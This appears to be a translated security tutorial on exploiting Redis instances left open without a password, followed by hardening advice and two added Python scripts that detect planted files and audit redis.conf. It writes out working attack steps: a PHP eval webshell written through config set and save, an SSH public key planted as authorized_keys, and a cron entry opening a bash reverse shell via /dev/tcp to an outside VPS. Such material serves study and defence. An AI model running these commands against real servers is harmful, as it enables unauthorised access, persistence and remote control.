Summary of Redis unauthorized access exploitation

Notes on setting up the environment:

Modify the redis.conf configuration file:

bind 0.0.0.0
daemonize yes

Open port 6379 in the iptables firewall:

 iptables -I INPUT 1 -p tcp -m state --state NEW -m tcp --dport 6379 -j ACCEPT

Install redis-cli on a Linux system:

wget http://download.redis.io/redis-stable.tar.gz
tar -zxf redis-stable.tar.gz
cd redis-stable
make                         # compile
cp ./src/redis-cli /usr/bin/ # /usr/local/bin is also on PATH and would work as well

The difference between /usr/bin/ and /usr/local/bin/

usr stands for Unix System Resource.

/usr/bin: executable programs that come pre-installed with the system; they change with system upgrades.

/usr/local/bin: executable programs installed by the user; they are not affected by system upgrades. Software that users compile and install themselves is generally placed in /usr/local/bin.

Priority in PATH: /usr/local/bin > /usr/bin

Basic Redis commands:

info     # view Redis information and server information
flushall # delete all data
del key  # delete the entry stored under key
get key  # fetch the value stored under key

Connecting to Redis with Windows tools

  1. telnet connection

telnet 192.168.10.3 6379

  2. Direct connection with the RedisDesktopManager client

Background:

Redis is an open source NoSQL database written in C.

Redis runs in memory and supports persistence. It stores data as key-value pairs and is an indispensable part of current distributed architectures.

Exploitation principle:

Writing files through Redis

Conditions for exploitation

1. Redis is bound to 0.0.0.0:6379 and no firewall rules or other security policies have been added to block access from untrusted source IPs. If the service is exposed directly to the public network, anyone can access Redis and perform operations on it without authorization, which can lead to further problems. Mainstream cases at present include the yam2 minerd mining program and the watch-smartd mining Trojan found in a large number of incident-response engagements.

2. No password authentication is set (the default is empty), so the Redis service can be logged into remotely without a password.

Exploitation methods

CNVD-2019-21763 reproduction

Background: Redis 4.x and above add a module feature that lets external extensions implement new Redis commands. With unauthorized access, an attacker can use this feature to make the attacked server load a malicious .so file as a module, thereby achieving remote code execution.

The connection here is normal, but command execution times out, which is probably a problem with the practice range.

Using Redis to write a webshell

Obtain the absolute path of the website via phpinfo or an error page.

config set: quickly modify the Redis configuration at runtime.

dbfilename: the file name of the snapshot; the default is dump.rdb.

dir: the directory in which Redis saves its files.

Once the website path is known, set dir to a directory a and dbfilename to a file name b, then execute save or bgsave, and a file of our choosing is written at the path a/b.

The commands are as follows:

config set dir /var/www/html/
config set dbfilename shell.php
set x "\r\n\r\n<?php eval($_POST[cmd]);?>\r\n\r\n"
save

\r\n is a newline; the file written by Redis will also contain some version information around the value.

The corresponding file was successfully found in the target folder.

Writing an ssh-keygen public key and logging in with the private key

Condition: the .ssh directory exists on the server and is writable.

The principle is to insert an entry into the database whose value is the local public key (the key name is arbitrary), then save the in-memory data to a file, so that an authorized_keys file is created under /root/.ssh on the server.

The commands are as follows:

Generate the key pair on Kali:

ssh-keygen -t rsa

The key pair is generated under /root/.ssh/ (id_rsa and id_rsa.pub).

(echo -e "\n\n"; cat id_rsa.pub; echo -e "\n\n") > key.txt
cat /root/.ssh/key.txt | redis-cli -h 10.10.10.152 -x set xxx

From the attacking machine, connect to the target's Redis, set the Redis save directory to /root/.ssh/ and the file name to authorized_keys, then save so the data is written to the target server's disk:

redis-cli -h 10.10.10.152 -p 6379
config set dir /root/.ssh
config set dbfilename authorized_keys
save

The public key is now present at the corresponding path on the victim machine.

SSH connects to the target machine successfully.

Using Redis to write a scheduled task

Insert a key-value pair into the database, change the database's default save path to the target host's scheduled-task directory, and save the in-memory data to a file, so that a scheduled task that spawns a reverse shell is written on the server.

# Reverse shell to port 7777 of the VPS
set xxx "\n\n*/1 * * * * /bin/bash -i >& /dev/tcp/47.94.xx.xx/7777 0>&1\n\n"
config set dir /var/spool/cron/crontabs/ # cron directory on Ubuntu; on CentOS it is /var/spool/cron/
config set dbfilename root
save

This method only works on CentOS; it does not work on Ubuntu, for the following reason:

The file written by Redis has permissions 644 by default, but Ubuntu requires a scheduled-task file under /var/spool/cron/crontabs/ to have mode 600 (-rw-------) before it will run it; otherwise cron reports (root) INSECURE MODE (mode 0600 expected). On CentOS, a scheduled-task file under /var/spool/cron/ with mode 644 is still executed.
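Two of the observations above give a defender something concrete to look for: a file written through SAVE carries the RDB header and version information in front of the planted value, and on Ubuntu such a crontab file has the wrong mode (644 instead of 600). The following script is an added example, not code from the original article; it audits the files in a directory for both indicators. The sample files, the RDB version and aux field bytes, and the /tmp/planted.sh line are constructed for the demonstration.

```python
import os
import re
import shutil
import stat
import tempfile
from typing import Dict, List, Optional

# RDB files start with "REDIS" followed by a four-digit format version, e.g. REDIS0009.
RDB_MAGIC = re.compile(rb"^REDIS(\d{4})")
# A line consisting only of printable ASCII; binary RDB framing never matches this.
PRINTABLE = re.compile(rb"^[\x20-\x7e]+$")


def rdb_header(path: str) -> Optional[str]:
    """Return the RDB version string if the file begins with an RDB header, else None."""
    with open(path, "rb") as fh:
        m = RDB_MAGIC.match(fh.read(9))
    return m.group(1).decode() if m else None


def planted_lines(path: str) -> List[str]:
    """Printable ASCII lines in the file. In a snapshot written by SAVE these are the
    attacker-controlled value; the binary framing around it is dropped."""
    with open(path, "rb") as fh:
        data = fh.read()
    return [ln.decode() for ln in data.split(b"\n") if PRINTABLE.match(ln)]


def check_file(path: str, expect_mode: Optional[int] = None) -> Dict:
    """Audit one file: RDB header, planted text and, if given, the mode cron expects."""
    mode = stat.S_IMODE(os.stat(path).st_mode)
    version = rdb_header(path)
    report = {
        "path": path,
        "rdb_version": version,
        "mode": oct(mode),
        "mode_ok": True if expect_mode is None else mode == expect_mode,
        "planted_lines": planted_lines(path) if version is not None else [],
    }
    report["suspicious"] = version is not None or not report["mode_ok"]
    return report


def scan_dir(directory: str, expect_mode: Optional[int] = None) -> List[Dict]:
    """Audit every regular file in a directory, e.g. /var/spool/cron/crontabs with expect_mode=0o600."""
    reports = []
    for name in sorted(os.listdir(directory)):
        p = os.path.join(directory, name)
        if os.path.isfile(p):
            reports.append(check_file(p, expect_mode))
    return reports


def demo() -> Dict[str, Dict]:
    """Build two constructed crontab files in a temporary directory and audit them."""
    workdir = tempfile.mkdtemp()
    try:
        # Constructed: what SAVE leaves behind when a value is planted into the crontab
        # directory. The aux field and trailing bytes are made up; the REDIS header and
        # the 644 mode are the indicators that matter.
        planted = os.path.join(workdir, "root")
        with open(planted, "wb") as fh:
            fh.write(b"REDIS0009\xfa\tredis-ver\x055.0.7\xfe\x00\x00\x03xxx\x1f")
            fh.write(b"\n\n*/1 * * * * /tmp/planted.sh\n\n")
            fh.write(b"\xff" + b"\x00" * 8)
        os.chmod(planted, 0o644)  # Redis writes the snapshot with mode 644

        # Constructed: an ordinary user crontab with the mode cron expects.
        clean = os.path.join(workdir, "alice")
        with open(clean, "wb") as fh:
            fh.write(b"0 3 * * * /usr/local/bin/backup.sh\n")
        os.chmod(clean, 0o600)

        return {os.path.basename(r["path"]): r for r in scan_dir(workdir, expect_mode=0o600)}
    finally:
        shutil.rmtree(workdir, ignore_errors=True)


if __name__ == "__main__":
    for name, rep in demo().items():
        flag = "SUSPICIOUS" if rep["suspicious"] else "ok"
        print(f"{name}: {flag} rdb={rep['rdb_version']} mode={rep['mode']} planted={rep['planted_lines']}")
```

Running scan_dir over /var/spool/cron/crontabs with expect_mode=0o600, or over a web root and the .ssh directories with no expected mode, surfaces both the RDB header and the text that was planted inside it.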

Common errors

  1. Errors that may occur when running config set dir /var/spool/cron/crontabs/:

The root user has never logged in. On a practice target, run ssh localhost on the target machine to set it up.

  2. (error) ERR Changing directory: Permission denied

Indicates that Redis is not running as root.

The difference between /var/spool/cron/ and /etc/crontab

/var/spool/cron/: this directory stores the crontab tasks of each user, including root. Each file is named after its creator; for example, the crontab created by tom is /var/spool/cron/tom. A user generally has at most one crontab file.

/etc/crontab: this file holds the crontab entries used to maintain the system and other tasks defined by the system administrator.

How to exploit Redis on Windows?

  1. If the absolute path of the web root can be obtained, write the webshell directly

Same as writing a webshell on Linux; only the website directory changes.

  2. Write startup items

The startup directory on Windows is

C:/Users/Administrator/AppData/Roaming/Microsoft/Windows/Start Menu/Programs/startup/

(You also need to know the other party's user name; the default is Administrator.)

to be continued

  3. Write MOF files, DLL hijacking, etc.

to be continued

References:

Summary of Redis Unauthorized Exploitation Methods in Windows Environment – FreeBuf Network Security Industry Portal

Unauthorized access to Redis under Windows – Anquanke – Security Information Platform (anquanke.com)

Defending against Redis unauthorized access

In the Redis installation directory, configure the redis.conf file correctly:

  • By default, bind 127.0.0.1 so the service is only reachable locally

  • Add a login password: edit redis.conf and add requirepass <password>

  • When the service must be reachable externally, change the default port (pick one that is not already in use), e.g. port 2333

  • Use iptables in combination with this to restrict which sources may connect

  • Drop privileges: run the Redis service as a low-privilege user (restart Redis for this to take effect)

  • Never start the Redis service as root
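To check a configuration against the list above before deployment, the following script parses a redis.conf and reports the weak settings it finds. It is an added example, not code from the original article or from the Redis project. The two configurations embedded in it are constructed: the first reproduces the lab settings from the environment set-up section, the second the recommended settings. bind, port, requirepass and protected-mode are real Redis directives; the 16-character password threshold is this example's own choice, since Redis answers AUTH attempts fast enough that short passwords are guessable.

```python
from typing import Dict, List

# Constructed: the settings from the environment set-up section of the article.
WEAK_CONF = """
bind 0.0.0.0
port 6379
daemonize yes
"""

# Constructed: the settings the defense section recommends.
HARDENED_CONF = """
bind 127.0.0.1
port 2333
protected-mode yes
requirepass CHANGE-ME-long-random-passphrase
daemonize yes
"""

# Bind values that make Redis listen on every interface.
ALL_INTERFACES = {"0.0.0.0", "*", "::", "* -::*"}
MIN_PASSWORD_LEN = 16  # this example's own threshold, not a Redis requirement


def parse_conf(text: str) -> Dict[str, List[str]]:
    """Map each directive to its argument strings. Redis treats only lines that
    start with '#' as comments, and a directive may appear more than once."""
    conf: Dict[str, List[str]] = {}
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        parts = line.split(None, 1)
        conf.setdefault(parts[0].lower(), []).append(parts[1] if len(parts) > 1 else "")
    return conf


def audit(conf: Dict[str, List[str]]) -> List[str]:
    """Return one finding per weak setting; an empty list means nothing was flagged."""
    findings = []

    binds = conf.get("bind")
    if not binds:
        findings.append("bind: missing, Redis listens on all interfaces")
    elif any(b.strip() in ALL_INTERFACES for b in binds):
        findings.append(f"bind: {binds[-1]} exposes Redis on every interface")

    passwords = conf.get("requirepass")
    if not passwords or not passwords[-1].strip():
        findings.append("requirepass: not set, any client can issue commands without AUTH")
    elif len(passwords[-1].strip()) < MIN_PASSWORD_LEN:
        findings.append(f"requirepass: shorter than {MIN_PASSWORD_LEN} characters")

    port = conf.get("port", ["6379"])[-1].strip()
    if port == "6379":
        findings.append("port: default 6379, the first port scanners try")

    if conf.get("protected-mode", ["yes"])[-1].strip().lower() == "no":
        findings.append("protected-mode: disabled, removes the built-in guard for unbound, unauthenticated instances")

    return findings


def audit_text(text: str) -> List[str]:
    """Convenience wrapper: parse and audit a redis.conf given as text."""
    return audit(parse_conf(text))


if __name__ == "__main__":
    for label, text in (("weak", WEAK_CONF), ("hardened", HARDENED_CONF)):
        print(f"[{label}]")
        for f in audit_text(text) or ["no findings"]:
            print("  -", f)
```

Point audit_text at the contents of a real redis.conf (open(path).read()) to check a server; the findings map one-to-one onto the items in the list above.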